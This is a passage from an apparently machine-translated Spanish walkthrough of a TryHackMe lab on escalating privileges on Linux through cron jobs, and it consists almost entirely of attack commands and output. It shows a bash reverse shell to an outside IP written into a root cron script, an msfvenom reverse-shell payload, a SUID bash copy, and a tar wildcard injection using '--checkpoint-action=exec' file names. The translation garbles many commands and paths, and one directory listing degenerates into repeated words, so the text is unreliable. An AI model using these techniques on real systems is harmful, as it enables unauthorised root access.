[Tryhackme] Elevación de privilegios usando trabajos cron! Linux Privesc Escritura Parte 5

SSH user@10.10.166.11 255 ⨯ La autenticidad del host '10 .10.166.11 (10.10.166.11) 'No se puede establecer. RSA Key Fingerprint es SHA256: JWWPVFQC+8LPQDA0B9WFLZZXCXCOAHO6S8WYGJKTANK. Esta clave de host se conoce por los siguientes otros nombres/direcciones: ~/.ssh/Know_hosts: 1: [Nombre hash] ¿Está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.166.11 '(RSA) a la lista de hosts conocidos. User@10.10.166.11 Caseña: Linux Debian 2.6.32-5-amd64 #1 SMP martes 13 de mayo 16:34:35 UTC 2014 x86_64 Los programas incluidos con el sistema GNU/Linux Debian son software gratuito; Los términos de distribución exactos para cada programa se describen en los archivos individuales en/usr/share/doc/*/copyright. Debian GNU/Linux no tiene absolutamente ninguna garantía, en la medida permitida por la ley aplicable. Último inicio de sesión: viernes 15 de mayo 06:41:23 2020 desde 192.168.1.125 Usuario@Debian: ~ $ 

usuario@debian: ~ $ cat /etc /crontab # /etc /crontab: crontab # en todo el sistema # A diferencia de cualquier otro crontab, no tiene que ejecutar el comando 'crontab' # para instalar la nueva versión cuando edita este # y archivos en /etc/cron.d. Estos archivos también tienen campos de nombre de usuario, # que ninguno de los otros crontabs. Shell =/bin/sh path =/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/usr/bin # mh dom lon comando de usuario 17 * * * * CD/&& run -Parts ---Peport /etc/CRON.HOURLY 25 6 * * * * Root -x/usr/sbin/anacron/anacron | (CD /&& Run -Parts -Report /etc/Cron.Daily) 47 6 * * 7 Root Test -x /usr /sbin /anacron || (CD /&& Run -Parts -Report /etc/Cron.weekly) 52 6 1 * * Root Test -x /usr /sbin /anacron || (CD/&& Run-Parts-Report /etc/Cron.Monthly) # * * * * * * Root Overwrite.sh * * * * * root /usr/local/bin/compress.sh

Usuario@Debian: ~ $ localate Overwrite.sh /usr/local/bin/overwrite.sh

Usuario@Debian: ~ $ ll /usr/local/bin/overwrite.sh -rwxr-rw- 1 Personal raíz 40 13 de mayo de 2017 /usr/local/bin/overwrite.sh

usuario@debian: ~ $ vi /usr/local/bin/overwrite.sh user@debian: ~ $ cat /usr/local/bin/overwrite.sh #!/bin/bash bash -i> & /dev/tcp/10.18.110.90/444 0> & 1

┌── (Hacklab㉿hackLab) -[~] └─ $ NC -NVLP 4444 escuchando en [cualquiera] 4444 ... Conéctese a [10.18.110.90] de (desconocido) [10.10.166.11] 52692 Bash: sin control de trabajo en este shell@Debian: ~### 

root@Debian: ~# whoami whoami root@Debian: ~# 

usuario@debian: ~ $ cat /etc /crontab # /etc /crontab: crontab # en todo el sistema # A diferencia de cualquier otro crontab, no tiene que ejecutar el comando 'crontab' # para instalar la nueva versión cuando edita este # y archivos en /etc/cron.d. Estos archivos también tienen campos de nombre de usuario, # que ninguno de los otros crontabs. Shell =/bin/sh path =/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/usr/bin # mh dom lon comando de usuario 17 * * * * CD/&& run -Parts ---Peport /etc/CRON.HOURLY 25 6 * * * * Root -x/usr/sbin/anacron/anacron | (CD /&& Run -Parts -Report /etc/Cron.Daily) 47 6 * * 7 Root Test -x /usr /sbin /anacron || (CD /&& Run -Parts -Report /etc/Cron.weekly) 52 6 1 * * Root Test -x /usr /sbin /anacron || (CD/&& Run-Parts-Report /etc/Cron.Monthly) # * * * * * * Root Overwrite.sh * * * * * root /usr/local/bin/compress.sh

Usuario@Debian: ~ $ vi /home/user/overwrite.sh user@debian: ~ $ cat /home/user/overwrite.sh #!/bin/bash cp/bin/bash/tmp/rootbash chmod +xs/tmp/rootbash

usuario@Debian: ~ $ /tmp /rootbash -p rootbash -4.1# whoami root

Usuario@Debian: ~ $ Cat /usr/local/bin/compress.sh #!/bin/sh CD/Home/User Tar czf /tmp/backup.tar.gz *

┌── (Hacklab㉿hackLab) -[~] └─ $ msfvenom -p linux/x64/shell_reverse_tcp lhost = 10.18.110.90 lport = 4444 -f elf -o shell.elf [ -] no se seleccionó la plataforma, elección de msf :: módulo :: plataforma: lineux de la carga de pago [ -] no, no seleccionado, seleccionando la plataforma de la plataforma, elección de MSF :: Módulo :: Plataforma: Linux de la carga de pago codificador especificado, salida de carga útil Tamaño de carga útil: 74 bytes Tamaño final del archivo ELF: 194 bytes guardados como: shell.elf

┌── (Hacklab㉿hackLab)-[~/Tryhackme/Linuxprivenv] └─ $ scp shell.elf user@10.10.166.11: ~/user@10.10.166.11 Castaz: shell.elf 100% 194 0.8kb/s 00:00 

Usuario@Debian: ~ $ LL Total 12 -RW-R-R-- 1 Usuario de usuario 212 15 de mayo de 2017 myvpn.ovpn -rw-r-r-- 1 usuario de usuario 194 de abril 6 09:18 shell.elf DRWXR-XR-X 8 Usuario 4096 May 15 2020 Herramientas 2020 Herramientas

chmod +x /home/user/shell.elf user@debian: ~ $ ll total 12 -rw-r-r-- 1 usuario user 212 15 de mayo de 2017 myvpn.ovpn -rwxr-xr-x 1 usuario user 194 de abril 6 09:18 shell.elf drawxr-xr-x user user 4096 1520 Herramientas 2020 Herramientas 2020 Herramientas 2020 de 2020 Herramientas 2020 de 2020 Herramientas 2020 de 2020 Herramientas 2020 de 2020 Herramientas 2020 2020 Herramientas 2020 2020 Herramientas de 2020 2020 Herramientas de 2020 2020 Herramientas de 2020 2020 de 2020 2020 Herramientas 2020 2020 Herramient

user@debian: ~ $ touch/home/user/-checkpoint = 1 user@debian: ~ $ touch /home/user/-checkpoint-acción=Exec=shell.elf user@debian: ~ $ ll total 12 -rw-r--r-- 1 usuario usuario 0 abr 6 09:26-checkpoint = 1 -rw-r-r-- 1 usuario user 0 abr 6 09:28-checkpoint-acción-acción-acción-acción-accion-action -rw-r-r-- 1 usuario usuario 212 15 de mayo de 2017 myvpn.ovpn -rwxr-xr-x 1 usuario user 194 abril 6 09:18 shell.elf DRWXR-XR-X 8 Usuario de usuario 4096 May 2020 Herramientas 2020 Herramientas

┌── (Hacklab㉿hackLab) -[~] └─ $ nc -nvlp 4444 escuchando en [cualquiera] 4444 ... conéctese a [10.18.110.90] de (desconocido) [10.10.166.11] 52692 Bash: sin control de trabajo en este shell root@Debian: ~# whoami root root@debian: ~########################################